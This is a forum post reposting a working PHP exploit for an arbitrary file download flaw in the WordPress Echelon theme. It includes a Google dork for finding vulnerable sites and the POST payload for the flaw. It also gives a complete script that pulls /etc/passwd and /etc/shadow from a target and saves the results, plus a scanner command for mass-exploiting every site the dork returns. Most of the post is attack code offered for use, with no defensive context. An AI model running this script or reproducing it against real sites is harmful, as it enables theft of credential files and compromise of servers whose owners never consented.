Aerosol Posted December 17, 2014 Report Posted December 17, 2014 *Name:*Wordpress A.F.D Theme Echelon / INURL - BRASIL*Description:*This exploit allows attacker to download any writable file from the server*Usage info:*Put the path of the file in the file's field of the exploit ,then click"Download" button then you get the file directlyFile download /etc/passwd & /etc/shadowFailure consists of exploring a parameter $ _POST file/wp-content/themes/echelon/lib/scripts/dl-skin.phpThe following fields are exploited for Arbitrary File Download*POST:*_mysite_download_skin={$config['file']}&submit=Downloadex:_mysite_download_skin=/etc/passwd&submit=Download*Exploit:*<?php#===============================================================================# NAME: Wordpress A.F.D Theme Echelon# TIPE: Arbitrary File Download# Google DORK: inurl:/wp-content/themes/echelon# Vendor: www.wordpress.org# Tested on: Linux# EXECUTE: php exploit.php www.alvo.com.br# OUTPUT: EXPLOIT_WPAFD_Echelon.txt# AUTOR: Cleiton Pinheiro# Blog: http://blog.inurl.com.br# Twitter: https://twitter.com/googleinurl# Fanpage: https://fb.com/InurlBrasil# GIT: https://github.com/googleinurl# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA##------------------------------------------------------------------------------# Comand Exec Scanner INURLBR:# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -ssave.txt --comand-all "php exploit.php _TARGET_"#------------------------------------------------------------------------------# Download Scanner INURLBR:# https://github.com/googleinurl/SCANNER-INURLBR#===============================================================================error_reporting(1);set_time_limit(0);ini_set('display_errors', 1);ini_set('max_execution_time', 0);ini_set('allow_url_fopen', 1);ob_implicit_flush(true);ob_end_flush();print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: phpexploit.php www.alvo.com.br') : NULL;$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";!(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i",$argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.phpwww.alvo.com.br') : NULL;$config['line'] ="\n------------------------------------------------------------------------------------------------------------------\n";$config['alvo'] = $alvo_[0][0];$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";function __plus() { ob_flush(); flush();}function __convertUrlQuery($query) { $queryParts = explode('&', $query); $params = array(); foreach ($queryParts as $param) { $item = explode('=', $param); $params[$item[0]] = urlencode($item[1]); } return $params;}function __request_info($curl, $config) { $postDados =__convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download"); foreach ($postDados as $campo => $valor) { $postDados_format .= $campo . '=' . ($valor) . '&'; } $postDados_format = rtrim($postDados_format, '&'); curl_setopt($curl, CURLOPT_POST, count($postDados)); curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format); curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31'); curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .$config['exploit']); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $corpo = curl_exec($curl); $server = curl_getinfo($curl); $status = NULL; preg_match_all('(HTTP.*)', $corpo, $status['http']); preg_match_all('(Server:.*)', $corpo, $status['server']); preg_match_all('(Content-Disposition:.*)', $corpo,$status['Content-Disposition']); $info = str_replace("\r", '', str_replace("\n", '',"{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}")); curl_close($curl); unset($curl); return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE;}function main($config,$rest) { __plus(); print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:{$config['file']}:\n"; preg_match_all("(root:.*)", $rest['corpo'], $final); preg_match_all("(sbin:.*)", $rest['corpo'], $final__); preg_match_all("(ftp:.*)", $rest['corpo'], $final___); preg_match_all("(nobody:.*)", $rest['corpo'], $final____); preg_match_all("(mail:.*)", $rest['corpo'], $final_____); $_final = array_merge($final[0], $final__[0], $final___[0],$final____[0], $final_____[0]); $res = NULL; if (preg_match("#root#i", $rest['corpo'])) { $res.= "0x " . date("h:m:s") . " [INFO][ISVULN][RESUME][VALUES]:\n"; $res.=$config['line'] . "\n"; foreach ($_final as $value) { $res.="0x " . date("h:m:s") . " [VALUE]: $value\n"; } $res.=$config['line']; __plus(); file_put_contents('EXPLOIT_WPAFD_Echelon.txt',"{$config['alvo']}\n{$res}\n", FILE_APPEND); print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n"; } else { print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n"; }}print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL -BRASIL\n";$config['file'] = '/etc/passwd';$rest = __request_info($objcurl = curl_init(), $config);__plus();print $line;print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";main($config,$rest);__plus();$config['file'] = '/etc/shadow';$rest = __request_info($objcurl = curl_init(), $config);__plus();main($config,$rest);__plus();Source Quote
